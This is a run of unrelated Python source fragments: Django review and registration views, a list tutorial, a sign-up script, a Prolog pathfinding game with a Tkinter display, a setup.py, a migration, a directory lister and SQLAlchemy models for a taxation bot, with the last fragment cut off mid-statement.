                'rating4': my_review.rating_4,
                'rating5': my_review.rating_5,
                'selected_tag_list' : selected_tag_list,
            })
        except ObjectDoesNotExist:
            return render(request, 'write_review.html', {
                'entity_info' : entity_info,
                'criteria_list' : criteria_list,
                'tag_list' : tag_list,
            })
    elif request.method == 'POST':
        # TODO: validate
        # populate data, currently ugly
        error = {}
        tag_id_list = Tag.objects.all().values_list('id', flat=True)
        # Reviews carry between 3 and 5 tags (slots tag_1..tag_5).
        selected_tag = [None, None, None, None, None]
        tag_count = 0
        for tag_id in tag_id_list:
            if request.POST.get(''.join(['tag',str(tag_id)])):
                if tag_count == 5:
                    error["tag"] = True
                    break
                selected_tag[tag_count] = tag_id
                tag_count += 1
        if tag_count < 3:
            error["tag"] = True
        if not request.POST.get('content'):
            error["content"] = True
        elif len(request.POST.get('content')) < 100:
            error["content"] = True
        if not request.POST.get('title'):
            error["title"] = True
        if not (request.POST.get('rating1') and request.POST.get('rating2') \
            and request.POST.get('rating3') and request.POST.get('rating4') \
            and request.POST.get('rating5')):
            error["rating"] = True
        if error:
            # Validation failed: re-render the form with the submitted values.
            entity_info = get_object_or_404(Entity, pk=entity_id)
            criteria_list = get_criteria_list(entity_info.is_teacher)
            tag_list = get_list_or_404(Tag)
            form_selected_tag = []
            for tag_id in tag_id_list:
                if request.POST.get(''.join(['tag',str(tag_id)])):
                    form_selected_tag.append(''.join(['tag',str(tag_id)]))
            return render(request, 'write_review.html', {
                'entity_info' : entity_info,
                'criteria_list' : criteria_list,
                'tag_list' : tag_list,
                'error' : error,
                'title' : request.POST.get('title'),
                'content' : request.POST.get('content'),
                'rating1': request.POST.get('rating1', 0),
                'rating2': request.POST.get('rating2', 0),
                'rating3': request.POST.get('rating3', 0),
                'rating4': request.POST.get('rating4', 0),
                'rating5': request.POST.get('rating5', 0),
                'selected_tag_list' : form_selected_tag,
            })
        try:
            print "No error validating review"
            print "Proceed to create or update review"
            Review.objects.update_or_create(
                author_id=request.user.myuser.pk,
                entity_id=entity_id,
                defaults={
                    'content': request.POST.get('content'),
                    'title': request.POST.get('title'),
                    'rating_1':request.POST.get('rating1'),
                    'rating_2':request.POST.get('rating2'),
                    'rating_3':request.POST.get('rating3'),
                    'rating_4':request.POST.get('rating4'),
                    'rating_5':request.POST.get('rating5'),
                    'tag_1_id':selected_tag[0],
                    'tag_2_id':selected_tag[1],
                    'tag_3_id':selected_tag[2],
                    'tag_4_id':selected_tag[3],
                    'tag_5_id':selected_tag[4],
                }
            )
            print "Review updated/created"
        except Exception, e:
            print traceback.print_exc()
        return HttpResponseRedirect(reverse(('show_entity'), args=(entity_id,)))


def delete_review(request, entity_id):
    """AJAX endpoint: delete the logged-in user's review for an entity."""
    try:
        if request.user.is_authenticated():
            try:
                review_to_delete = Review.objects.get(author_id=request.user.myuser.pk,entity_id=entity_id)
                print "Found review to delete"
                review_to_delete.delete()
                return HttpResponse("OK")
            except ObjectDoesNotExist:
                return None
        return None
    except Exception, e:
        print traceback.print_exc()


def show_index(request):
    return render(request, 'index.html')


# dev register
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User


class UserForm(forms.ModelForm):
    # Render the password field masked.
    password = forms.CharField(widget=forms.PasswordInput())

    class Meta:
        model = User
        fields = ('username', 'email', 'password')


class MyUserForm(forms.ModelForm):
    class Meta:
        model = MyUser
        fields = ('profile_pic', 'short_bio', 'name')


def register(request):
    """Registration view: create a User plus its MyUser profile."""
    # A boolean value for telling the template whether the registration was successful.
    registered = False
    if request.method == 'POST':
        user_form = UserForm(data=request.POST)
        myuser_form = MyUserForm(data=request.POST)
        # If the two forms are valid...
        if user_form.is_valid() and myuser_form.is_valid():
            user = user_form.save()
            # Re-save with the hashed password (the form stored it raw).
            user.set_password(user.password)
            user.save()
            myuser = myuser_form.save(commit=False)
            myuser.user = user
            if 'profile_pic' in request.FILES:
                print 'Profile pic is transported'
                myuser.profile_pic = request.FILES['profile_pic']
            myuser.save()
            registered = True
        else:
            print user_form.errors, myuser_form.errors
    else:
        user_form = UserForm()
        myuser_form = MyUserForm()
    # Render the template depending on the context.
    return render(request, 'registration/register.html',
            {'user_form': user_form, 'myuser_form': myuser_form, 'registered': registered} )
# Lists in Python # Lists are one of the most powerful tools in python. # They are just like the arrays declared in other languages. # But the most powerful thing is that list need not be always homogeneous. # A single list can contain strings, integers, as well as objects. # Lists can also be used for implementing stacks and queues. # Lists are mutable, i.e., they can be altered once declared. # Declaring a list L = [1, "a" , "string" , 1+2] print L L.append(6) print L L.pop() print L print L[1] # Output :- [1, 'a', 'string', 3] [1, 'a', 'string', 3, 6] [1, 'a', 'string', 3] a # Lists are just like dynamic sized arrays, declared in other languages (vector in C++ and ArrayList in Java). # Lists need not be homogeneous always which makes it a most powerful tool in Python. # A single list may contain DataTypes like Integers, Strings, as well as Objects. # Lists are mutable, and hence, they can be altered even after their creation. # ----------------------------Creating List ------------------------------------ # Lists in Python can be created by just placing the sequence inside the square brackets[]. # Unlike Sets, list doesn’t need a built-in function for creation of list. # Creating a List List = [] print("Blank List: ") print(List) # Creating a List of numbers List = [10, 20, 14] print("\nList of numbers: ") print(List) # Creating a List of strings and accessing # using index List = ["Geeks", "For", "Geeks"] print("\nList Items: ") print(List[0]) print(List[2]) # Creating a Multi-Dimensional List # (By Nesting a list inside a List) List = [['Geeks', 'For'] , ['Geeks']] print("\nMulti-Dimensional List: ") print(List) # Creating a list with multiple distinct or duplicate elements # A list may contain duplicate values with their distinct positions and # hence, multiple distinct or duplicate values can be passed as a sequence at the time of list creation. 
# Creating a List with # the use of Numbers # (Having duplicate values) List = [1, 2, 4, 4, 3, 3, 3, 6, 5] print("\nList with the use of Numbers: ") print(List) # Creating a List with # mixed type of values # (Having numbers and strings) List = [1, 2, 'Geeks', 4, 'For', 6, 'Geeks'] print("\nList with the use of Mixed Values: ") print(List) # for size len(list1) # Adding elements to the list # Elements can be added to the List by using built-in append() function. # Only one element at a time can be added to the list by using append() method, # for addition of multiple elements with the append() method, loops are used. # Tuples can also be added to the List with the use of append method because tuples are immutable. # Unlike Sets, Lists can also be added to the existing list with the use of append() method. # Creating a List List = [] print("Initial blank List: ") print(List) # Addition of Elements # in the List List.append(1) List.append(2) List.append(4) # ---> Using insert() method # append() method only works for addition of elements at the end of the List, # for addition of element at the desired position, insert() method is used. # Unlike append() which takes only one argument, insert() method requires two arguments(position, value). # Creating a List List = [1,2,3,4] print("Initial List: ") print(List) # Addition of Element at # specific Position # (using Insert Method) List.insert(3, 12) List.insert(0, 'Geeks') print("\nList after performing Insert Operation: ") print(List) # ---> Using extend() method #Other than append() and insert() methods, there’s one more method for Addition of elements, extend(), # this method is used to add multiple elements at the same time at the end of the list. 
# Creating a List List = [1,2,3,4] print("Initial List: ") print(List) # Addition of multiple elements # to the List at the end # (using Extend Method) List.extend([8, 'Geeks', 'Always']) print("\nList after performing Extend Operation: ") print(List) # ----------------------------Removing elements from the List ------------------------------------ # Using remove() method # Elements can be removed from the List by using built-in remove() function but # an Error arises if element doesn’t exist in the set. # Remove() method only removes one element at a time, to remove range of elements, iterator is used. # The remove() method removes the specified item. # Note – Remove method in List will only remove the first occurrence of the searched element. # Creating a List List = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] print("Intial List: ") print(List) # Removing elements from List # using Remove() method List.remove(5) List.remove(6) print("\nList after Removal of two elements: ") print(List) # Removing elements from List # using iterator method for i in range(1, 5): List.remove(i) print("\nList after Removing a range of elements: ") print(List) # Using pop() method :- removes last element # Removing element at a # specific location from the # Set using the pop() method List.pop(2) # ----------------------------Slicing List ------------------------------------ # In Python List, there are multiple ways to print the whole List with all the elements, # but to print a specific range of elements from the list, we use Slice operation. # Slice operation is performed on Lists with the use of a colon(:). # To print elements from beginning to a range use [: Index], to print elements from end-use [:-Index], # to print elements from specific Index till the end use [Index:], # to print elements within a range, use [Start Index:End Index] and to print the whole List with the use of slicing operation, # use [:]. Further, to print the whole List in reverse order, use [::-1]. 
# Creating a List List = ['G','E','E','K','S','F', 'O','R','G','E','E','K','S'] print("Intial List: ") print(List) # Print elements of a range # using Slice operation Sliced_List = List[3:8] print("\nSlicing elements in a range 3-8: ") print(Sliced_List) # Print elements from a # pre-defined point to end Sliced_List = List[5:] print("\nElements sliced from 5th " "element till the end: ") print(Sliced_List) # Printing elements from # beginning till end Sliced_List = List[:] print("\nPrinting all elements using slice operation: ") print(Sliced_List)
#user_maker.py
__author__='''Shivek Khurana'''
__version__='''01.12.04.2010 | read as version.day.month.year'''
__doc__='''Description : Create a dictionary named users, and add functionality to add, remove a user.'''

# Registered users, mapping username -> email address.
uname={'shivek':'shivekk@gmail.com','mehak':'mehak@ls.com'}


def username_input():
    '''Prompt until a free, non-trivial username is entered.

    The accepted name is stored in the module-level variable ``u`` so the
    top-level registration code can use it afterwards.
    '''
    global u
    while True:
        u = input('username : ')
        if len(u) <= 1:
            # Require at least two characters.
            print('''invalid username :{''')
        elif u in uname:  # idiomatic membership test (was uname.__contains__)
            print('''username already in use :(''')
        else:
            break


def email_validator(email):
    '''Validate *email*; on any failure, re-prompt via email_input().'''
    import re
    if len(email) >= 6:
        # Rough pattern: local part, '@', domain, then a 2-3 letter TLD
        # (or a bracketed numeric address).
        if re.match("^.+\\@(\\[?)[a-zA-Z0-9\\-\\.]+\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\]?)$", email) is not None:
            for a, b in uname.items():
                if email == b:
                    print('''email already in use :{''')
                    return email_input()
            print('''done''')
        else:
            print('''email not valid :(''')
            return email_input()
    else:
        print('''invalid email :{''')
        return email_input()


def email_input():
    '''Prompt for an email address and validate it.

    BUG FIX: ``e`` is now declared global.  Previously it was a local
    variable, so the module-level ``uname[u] = e`` below raised NameError.
    '''
    global e
    e = input('''email id : ''')
    email_validator(e)


def lister():
    '''Print every registered user as "name : email".'''
    for a, b in uname.items():
        print('''{0} : {1}'''.format(a, b))


def form():
    '''Run the interactive sign-up: username first, then email.'''
    username_input()
    email_input()


form()
uname[u] = e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
LICENSE FOR USING PYSWIP
Copyright (c) 2007-2018 Yüce Tekol

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Prolog inference engine (PySWIP bridge).
from pyswip import Prolog
# Tkinter / PIL: graphical interface.
from tkinter import *
from PIL import ImageTk, Image
# time: used to pace the step-by-step animation.
import time


# GUI helper: True when grid cell (coluna, linha) holds a ladder endpoint.
# Each entry of the module-level `escada` list is
# [floor_below, floor_above, x_position].
# NOTE(review): the first parameter `esctimeada` is never used; the body
# reads the module-level `escada` instead (looks like a typo for `escada`)
# — confirm before relying on the argument.
def temEscada(esctimeada, coluna, linha):
    for i in range (0, len(escada)):
        if(escada[i][1] == linha and escada[i][2] == coluna):
            # Cell is the upper end of ladder i.
            return True
        elif(escada[i][0] == linha and escada[i][2] == coluna):
            # Cell is the lower end of ladder i.
            return True
    return False

# Dialog window asking for the starting (X, Y) positions of the policeman
# ("policial") and the thief ("ladrao").
master = Tk()
master.title("Seleção das posições")
Label(master, text="Policial (X,Y)").grid(row=0)
Label(master, text="Ladrao (X,Y)").grid(row=1)
e1 = Entry(master)
e2 = Entry(master)
e3 = Entry(master)
e4 = Entry(master)
e1.grid(row=0, column=1)
e2.grid(row=0, column=2)
e3.grid(row=1, column=1)
e4.grid(row=1, column=2)
Button(master, text='Iniciar', command=master.quit).grid(row=5, column=1, sticky=W, pady=3)
mainloop( )

# Read the chosen positions (no validation: non-numeric text raises ValueError).
policiaX = int(e1.get())
policiaY = int(e2.get())
ladraoX = int(e3.get())
ladraoY = int(e4.get())
master.destroy()

# Prolog instance used as the inference engine.
prolog = Prolog()

# Cart ("carrinho") obstacles as (x, y) grid positions.
carrinho = [[4,3],[6,1],[4,5],[3,5],[8,2]]
for i in range(0,len(carrinho)):
    prolog.assertz("carrinho(" + str(carrinho[i][0]) + "," + str(carrinho[i][1]) + ")")

# Each ladder ("escada") is [floor_below, floor_above, x_position], e.g. [2,5,3].
escada = [[1,2,4],[2,3,1],[3,4,9],[4,5,6],[1,2,10]]
for i in range(0,len(escada)):
    prolog.assertz("escada(" + str(escada[i][0]) + "," + str(escada[i][1]) + "," + str(escada[i][2]) + ")")

# Helper predicates (PROLOG): ladrao/4 succeeds while the policeman
# (Xp,Yp) has not yet reached the thief's cell (Xl,Yl).
prolog.assertz("ladrao(_,Yp,_,Yl) :- Yp =\= Yl")
prolog.assertz("ladrao(Xp,Yp,Xl,Yl) :- Yp == Yl, Xp =\= Xl")

#2 - The right side is jumpable: cart at x+1, landing cell x+2 clear of
#    carts and ladders, and x+2 is not already the thief's cell (PROLOG).
prolog.assertz("livreDireita(Xp,Yp,Xl,Yl) :- Xp1 is Xp+1, Xp2 is Xp+2, carrinho(Xp1,Yp), not(carrinho(Xp2,Yp)), not(escada(Yp,_,Xp2)), not(escada(_,Yp,Xp2)), ladrao(Xp2,Yp,Xl,Yl)")

#3 - The cell immediately to the right is free of carts (PROLOG).
prolog.assertz("livreIDireita(Xp,Yp) :- Xp1 is Xp+1, not(carrinho(Xp1,Yp))")

#4 - The left side is jumpable (mirror of livreDireita) (PROLOG).
prolog.assertz("livreEsquerda(Xp,Yp,Xl,Yl) :- Xp1 is Xp-1, Xp2 is Xp-2, carrinho(Xp1,Yp), not(carrinho(Xp2,Yp)), not(escada(Yp,_,Xp2)), not(escada(_,Yp,Xp2)), ladrao(Xp2,Yp,Xl,Yl)")

#5 - The cell immediately to the left is free of carts (PROLOG).
prolog.assertz("livreIEsquerda(Xp,Yp) :- Xp1 is Xp-1, not(carrinho(Xp1,Yp))")

#6 - Membership predicate, used to avoid revisiting states (PROLOG).
prolog.assertz("pertence(Elem, [Elem|_])")
prolog.assertz("pertence(Elem, [_|Cauda]):- pertence(Elem, Cauda)")

# Actions.  Each acao/5 clause maps (name, visited-list, new-visited-list,
# state-before, state-after); states are estado(Xp,Yp,Xl,Yl).

#7 - Walk one cell to the right (PROLOG).
prolog.assertz("acao(aDireita, L, [[d,Xp2,Yp]|L], estado(Xp1,Yp,Xl,Yl), estado(Xp2,Yp,Xl,Yl)) :- Xp1 < 10, livreIDireita(Xp1,Yp), Xp2 is Xp1+1, not(pertence([d,Xp2,Yp],L))")

#8 - Jump over a cart that sits to the policeman's right (PROLOG).
# NOTE(review): the guard `Xpe > 2` looks like the *leftward* jump's bound
# (a rightward jump landing at Xpe+2 would need an upper bound such as
# `Xpe < 8`); rule #10 below uses `Xpe < 8`.  The two guards appear to be
# swapped — confirm against the intended 10-column board.
prolog.assertz("acao(pularCarrinhoD, L, [[pcd,Xps,Yp]|L], estado(Xpe,Yp,Xl,Yl), estado(Xps,Yp,Xl,Yl)) :- Xpe > 2, Xp1 is Xpe+1, Xps is Xpe+2, carrinho(Xp1,Yp), livreDireita(Xpe,Yp,Xl,Yl), not(pertence([pcd,Xps,Yp],L))")

#11 - Climb a ladder from floor Yp1 to floor Yp2 (PROLOG).
prolog.assertz("acao(subir, L, [[s,Xp,Yp2]|L], estado(Xp,Yp1,Xl,Yl), estado(Xp,Yp2,Xl,Yl)) :- Yp1 < 5, escada(Yp1,Yp2,Xp), not(pertence([s,Xp,Yp1],L))")

#9 - Walk one cell to the left (PROLOG).
prolog.assertz("acao(aEsquerda, L, [[e,Xp2,Yp]|L], estado(Xp1,Yp,Xl,Yl), estado(Xp2,Yp,Xl,Yl)) :- Xp1 > 1, livreIEsquerda(Xp1,Yp), Xp2 is Xp1-1, not(pertence([e,Xp2,Yp],L))")

#10 - Jump over a cart that sits to the policeman's left (PROLOG).
# NOTE(review): see rule #8 — `Xpe < 8` here permits Xpe=1 (landing at -1);
# the guards of #8 and #10 look swapped.
prolog.assertz("acao(pularCarrinhoE, L, [[pce,Xps,Yp]|L], estado(Xpe,Yp,Xl,Yl), estado(Xps,Yp,Xl,Yl)) :- Xpe < 8, Xp1 is Xpe-1, Xps is Xpe-2, carrinho(Xp1,Yp), livreEsquerda(Xpe,Yp,Xl,Yl), not(pertence([pce,Xps,Yp],L))")

#12 - Climb down a ladder (PROLOG).
prolog.assertz("acao(descer, L, [[d,Xp,Yp2]|L], estado(Xp,Yp1,Xl,Yl), estado(Xp,Yp2,Xl,Yl)) :- Yp1 >= 0, escada(Yp2,Yp1,Xp), not(pertence([d,Xp,Yp2],L))")

#1 - Goal reached: policeman and thief share the same cell (PROLOG).
prolog.assertz("consegue(T, estado(X,Y,X,Y), T)")

#13 - Recursive case: apply one action, then keep searching (PROLOG).
prolog.assertz("consegue(L, Estado2, L2) :- acao(_, L, L1, Estado2, Estado1), consegue(L1, Estado1, L2)")

#14 - Entry point: solve from the policeman's (X,Y) and thief's (Z,W)
#     start positions; the cut keeps only the first solution (PROLOG).
prolog.assertz("solucao(estado(X,Y,Z,W), L) :- acao(_, [[i,X,Y]], L1, estado(X,Y,Z,W), Estado1), consegue(L1, Estado1, L), !")

# Run the query; x is empty when no path exists.
x = list(prolog.query("solucao(estado(" + str(policiaX) + "," + str(policiaY) + "," + str(ladraoX) + "," + str(ladraoY) + "), X)"))

if(x != []):
    # Parse pyswip's string rendering of the answer into [[x, y], ...]
    # waypoints.  NOTE(review): this slicing/splitting is tied to the
    # exact repr produced by pyswip — fragile across pyswip versions.
    resposta = str(x[0])
    tam = len(resposta)
    respostaTratada = resposta[6:tam-1]
    respostaTratada = respostaTratada.split('A')
    respostaTratada.pop(0)
    listaTemp = []
    for i in range (0,len(respostaTratada)-1):
        temp = respostaTratada[i].split(',')
        temp.pop(0)
        temp.pop(len(temp)-1)
        temp[1] = temp[1][0:2]
        listaTemp.append(temp)
    # Steps were accumulated goal-first; reverse into walking order.
    listaTemp.reverse()

    # Tk window that animates the found path.
    root = Tk()
    root.title("Demonstrativo do caminho")
    Button(root, text='Quit', command=root.quit).grid(row=6, column=5, sticky=W, pady=3)

    # Sprite layers for the display.
    imgbranco = ImageTk.PhotoImage(Image.open("Image/branco.png"))
    imgpoli = ImageTk.PhotoImage(Image.open("Image/policial.png"))
    imgladrao = ImageTk.PhotoImage(Image.open("Image/ladrao.png"))
    imgcar = ImageTk.PhotoImage(Image.open("Image/carrinho.png"))
    imgesc = ImageTk.PhotoImage(Image.open("Image/escada.png"))
    imgPoliEsc = ImageTk.PhotoImage(Image.open("Image/policiaEscada.png"))

    # First layer: the 5x10 map (row 0 on screen is the top floor).
    imglabel = []
    for i in range (0,5):
        linha = []
        for j in range (0,10):
            if([j+1,5-i] in carrinho):
                linha.append(Label(root, image=imgcar).grid(row=i, column=j))
            else:
                linha.append(Label(root, image=imgbranco).grid(row=i, column=j))
        imglabel.append(linha)

    # Draw both endpoints of every ladder.
    for i in range(0, len(escada)):
        imglabel[5-escada[i][2]][escada[i][1]-1] = Label(root, image=imgesc).grid(row=5-escada[i][1], column=escada[i][2]-1)
        imglabel[5-escada[i][2]][escada[i][0]-1] = Label(root, image=imgesc).grid(row=5-escada[i][0], column=escada[i][2]-1)

    # Second layer: the policeman and the thief sprites.
    imglabel2 = Label(root, image=imgpoli).grid(row=5-policiaY, column=policiaX-1)
    imglabel2 = Label(root, image=imgladrao).grid(row=5-ladraoY, column=ladraoX-1)

    # Show the initial frame, then move the policeman to the first waypoint.
    root.update_idletasks()
    root.update()
    time.sleep(0.5)
    imglabel[5-policiaY][policiaX-1] = Label(root, image=imgbranco).grid(row=5-policiaY, column=policiaX-1)
    imglabel2 = Label(root, image=imgpoli).grid(row=5-int(listaTemp[0][1]), column=int(listaTemp[0][0])-1)
    tinhaEscada = False

    # Animation loop: redraw the cell the policeman left (restoring a
    # ladder sprite if there was one), draw him at the next waypoint, and
    # pause.  All path-finding was already done by the Prolog engine.
    for i in range (1, len(listaTemp)):
        colunaA = int(listaTemp[i-1][0])
        linhaA = int(listaTemp[i-1][1])
        coluna = int(listaTemp[i][0])
        linha = int(listaTemp[i][1])
        if(tinhaEscada):
            imglabel[5-linhaA][colunaA-1] = Label(root, image=imgesc).grid(row=5-linhaA, column=colunaA-1)
        else:
            imglabel[5-linhaA][colunaA-1] = Label(root, image=imgbranco).grid(row=5-linhaA, column=colunaA-1)
        if(temEscada(escada, coluna, linha)):
            imglabel2 = Label(root, image=imgPoliEsc).grid(row=5-linha, column=coluna-1)
            tinhaEscada = True
        else:
            imglabel2 = Label(root, image=imgpoli).grid(row=5-linha, column=coluna-1)
            tinhaEscada = False
        root.update_idletasks()
        root.update()
        time.sleep(0.5)
    root.mainloop()
    root.destroy()

    # Summary window: a path was found.
    root = Tk()
    root.title("Relatorio")
    Label(root, text="Fantasma WIN").grid(row=0)
    Label(root, text="Foi possivel encontrar um caminho").grid(row=1)
    root.mainloop()
else:
    # No solution: show the static board only.
    root = Tk()
    root.title("Demonstrativo do caminho")
    Button(root, text='Quit', command=root.quit).grid(row=6, column=5, sticky=W, pady=3)

    # Sprite layers for the display.
    imgbranco = ImageTk.PhotoImage(Image.open("Image/branco.png"))
    imgpoli = ImageTk.PhotoImage(Image.open("Image/policial.png"))
    imgladrao = ImageTk.PhotoImage(Image.open("Image/ladrao.png"))
    imgcar = ImageTk.PhotoImage(Image.open("Image/carrinho.png"))
    imgesc = ImageTk.PhotoImage(Image.open("Image/escada.png"))
    imgPoliEsc = ImageTk.PhotoImage(Image.open("Image/policiaEscada.png"))

    # First layer: the 5x10 map.
    imglabel = []
    for i in range (0,5):
        linha = []
        for j in range (0,10):
            if([j+1,5-i] in carrinho):
                linha.append(Label(root, image=imgcar).grid(row=i, column=j))
            else:
                linha.append(Label(root, image=imgbranco).grid(row=i, column=j))
        imglabel.append(linha)

    # Draw both endpoints of every ladder.
    for i in range(0, len(escada)):
        imglabel[5-escada[i][2]][escada[i][1]-1] = Label(root, image=imgesc).grid(row=5-escada[i][1], column=escada[i][2]-1)
        imglabel[5-escada[i][2]][escada[i][0]-1] = Label(root, image=imgesc).grid(row=5-escada[i][0], column=escada[i][2]-1)

    # Second layer: the policeman and the thief sprites.
    imglabel2 = Label(root, image=imgpoli).grid(row=5-policiaY, column=policiaX-1)
    imglabel2 = Label(root, image=imgladrao).grid(row=5-ladraoY, column=ladraoX-1)

    # Show the static frame until the user quits.
    root.mainloop()
    root.destroy()

    # Summary window: no path was found.
    root = Tk()
    root.title("Relatorio")
    Label(root, text="Pac-Man WIN").grid(row=0)
    Label(root, text="Não foi possivel encontrar um caminho").grid(row=1)
    root.mainloop()
from setuptools import setup

setup(
    name='security-webcam',
    version='0.1',
    author='Hsuan-Hau Liu',
    description='Simple security camera system right on your computer.',
    url='https://github.com/hsuanhauliu/security-webcam',
    # The importable package is 'security_webcam'; its sources live under
    # src/security_webcam (mapped via package_dir).
    packages=['security_webcam', ],
    package_dir={'security_webcam': 'src/security_webcam'},
    install_requires=[
        'opencv-python>=4.1.1.26',
        'numpy>=1.17.4'
    ],
    entry_points={
        'console_scripts': [
            # BUG FIX: after installation the package is importable as
            # 'security_webcam', not 'src.security_webcam' — the previous
            # target made the console script fail with ImportError.
            'security_webcam=security_webcam.__main__:main'
        ]
    },
    python_requires='>=3.6'
)
# Generated by Django 2.0.5 on 2018-05-31 13:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('blog', '0006_auto_20180531_1458'), ] operations = [ migrations.AddField( model_name='post', name='description', field=models.TextField(default='Two-three sentences as a description'), ), ]
'''
import os
filelist=os.listdir(r"C:\\Users\\ehuamay\\Desktop\\pm_report_tags")
#print(filelist)
for file in filelist:
    if os.path.isdir("C:\\Users\\ehuamay\\Desktop\\pm_report_tags\\"+file):
        print("文件夹", file)
    else:
        print("文件", file)
'''
# NOTE: the triple-quoted block above is a dead first draft; it is kept
# verbatim because, as the module's first statement, it is also __doc__.
import os


def getall(path):
    """Recursively print every entry under *path*.

    Directories are announced with the label "文件夹" and then descended
    into; regular files are announced with the label "文件".
    """
    for entry in os.listdir(path):
        child = os.path.join(path, entry)
        if os.path.isdir(child):
            print("文件夹", entry)
            getall(child)
        else:
            print("文件", entry)


getall(r"C:\Users\ehuamay\Desktop\pm_report_tags")
"""SQLAlchemy models for a taxation-service bot.

Fixes relative to the previous revision:

* ``Payment.employee`` now declares ``back_populates="payment"``.  The
  one-sided ``back_populates`` (``Employee.payment`` pointed at
  ``Payment.employee``, which did not point back) makes SQLAlchemy raise
  at mapper-configuration time.
* The malformed cascade strings ``'all ,delete'`` were normalised to
  ``'all, delete'`` for consistency with ``TaxationService.payments``.
"""
import enum

from botmanlib.models import Database, BaseUser, UserPermissionsMixin, BasePermission, BaseUserSession, UserSessionsMixin
from sqlalchemy import Column, Float, Integer, Enum, String, ForeignKey, DateTime
from sqlalchemy.orm import object_session, relationship

database = Database()
Base = database.Base


class User(Base, BaseUser, UserPermissionsMixin, UserSessionsMixin):
    """Bot user with permissions and sessions."""
    __tablename__ = 'users'

    def init_permissions(self):
        """Attach every default permission to this user (idempotent)."""
        session = object_session(self)
        if session is None:
            # Detached instance: fall back to the module-level session.
            session = database.DBSession
        for permission in ['start_menu_access', ]:
            perm = session.query(Permission).get(permission)
            if perm not in self.permissions:
                self.permissions.append(perm)


class Permission(BasePermission, Base):
    __tablename__ = 'permissions'


class ServiceType(enum.Enum):
    """Coverage level of a taxation service."""
    urban = 'urban'
    district = 'district'
    regional = 'regional'

    def to_str(self):
        """Russian display name for the UI."""
        return {
            ServiceType.urban: "Городская",
            ServiceType.district: "Районная",
            ServiceType.regional: "Региональная",
        }.get(self, "Неизвестно")


class PaymentType(enum.Enum):
    """Kind of tax payment."""
    value_added_tax = 'value added tax'
    income_tax = 'income tax'
    penalty_for_tax_evasion = 'penalty for tax evasion'

    def to_str(self):
        """Russian display name for the UI."""
        return {
            PaymentType.value_added_tax: "Налог на добавленную стоимость",
            PaymentType.income_tax: "Подоходный налог",
            PaymentType.penalty_for_tax_evasion: "Штраф за уклонение от уплаты налогов",
        }.get(self, "Неизвестно")


class EmployeeEducation(enum.Enum):
    """Education level of a taxation-service employee."""
    higher_education = 'higher education'
    secondary_technical_education = 'secondary technical education'
    secondary_education = 'secondary education'
    specialized_secondary_education = 'specialized secondary education'

    def to_str(self):
        """Russian display name for the UI."""
        return {
            EmployeeEducation.higher_education: "Высшее образование",
            EmployeeEducation.secondary_technical_education: "Среднее техническое образование",
            EmployeeEducation.secondary_education: "Среднее образование",
            EmployeeEducation.specialized_secondary_education: "Среднее специальное образование",
        }.get(self, "Неизвестно")


class CompanyType(enum.Enum):
    """Ownership form of a company."""
    state = 'state'
    private = 'private'
    ZAO = 'ZAO'
    OAO = 'OAO'
    OOO = 'OOO'

    def to_str(self):
        """Russian display name for the UI."""
        return {
            CompanyType.state: "Государственное",
            CompanyType.private: "Частное",
            CompanyType.ZAO: "ЗАО",
            CompanyType.OAO: "ОАО",
            CompanyType.OOO: "ООО",
        }.get(self, "Неизвестно")


class EmployeePayment(Base):
    """Association table linking employees to the payments they handled."""
    __tablename__ = 'employee_payment_association_table'
    employee_id = Column(Integer, ForeignKey('employees.id'), primary_key=True)
    employee = relationship("Employee")
    payment_id = Column(Integer, ForeignKey('payments.id'), primary_key=True)
    payment = relationship("Payment")


class TaxationService(Base):
    """A taxation office with its staff and processed payments."""
    __tablename__ = 'taxation_services'
    id = Column(Integer, primary_key=True)
    type = Column(Enum(ServiceType), default=ServiceType.regional)
    name = Column(String, nullable=False)
    city = Column(String, nullable=False)
    year = Column(Integer, nullable=False)
    phone = Column(String, nullable=False)
    address = Column(String, nullable=False)
    # Children are removed together with the service (was 'all ,delete').
    employees = relationship("Employee", back_populates='taxation_service', cascade='all, delete')
    payments = relationship("Payment", back_populates='taxation_service', cascade='all, delete')


class Employee(Base):
    """A taxation-service employee."""
    __tablename__ = 'employees'
    id = Column(Integer, primary_key=True)
    FIO = Column(String, nullable=False)
    date_of_birth = Column(DateTime, nullable=False)
    position = Column(String, nullable=False)
    salary = Column(Integer, nullable=False, default=0)
    educational_degree = Column(Enum(EmployeeEducation), default=EmployeeEducation.specialized_secondary_education)
    taxation_service_id = Column(Integer, ForeignKey('taxation_services.id'), nullable=False)
    taxation_service = relationship("TaxationService", back_populates="employees")
    # Many-to-many with Payment through the association table.
    payment = relationship("Payment", secondary=EmployeePayment.__table__,
                           back_populates="employee", lazy='joined')


class Payment(Base):
    """A single tax payment processed by a taxation service."""
    __tablename__ = 'payments'
    id = Column(Integer, primary_key=True)
    date = Column(DateTime, nullable=False)
    amount = Column(Float, nullable=False)
    type = Column(Enum(PaymentType), default=PaymentType.income_tax)
    taxation_service_id = Column(Integer, ForeignKey('taxation_services.id'), nullable=False)
    taxation_service = relationship("TaxationService", back_populates="payments")
    # Companies are removed together with the payment (was 'all ,delete').
    companies = relationship("Company", back_populates='payment', cascade='all, delete')
    # BUG FIX: back_populates="payment" added — the reverse side
    # (Employee.payment) already declared back_populates="employee".
    employee = relationship("Employee", secondary=EmployeePayment.__table__,
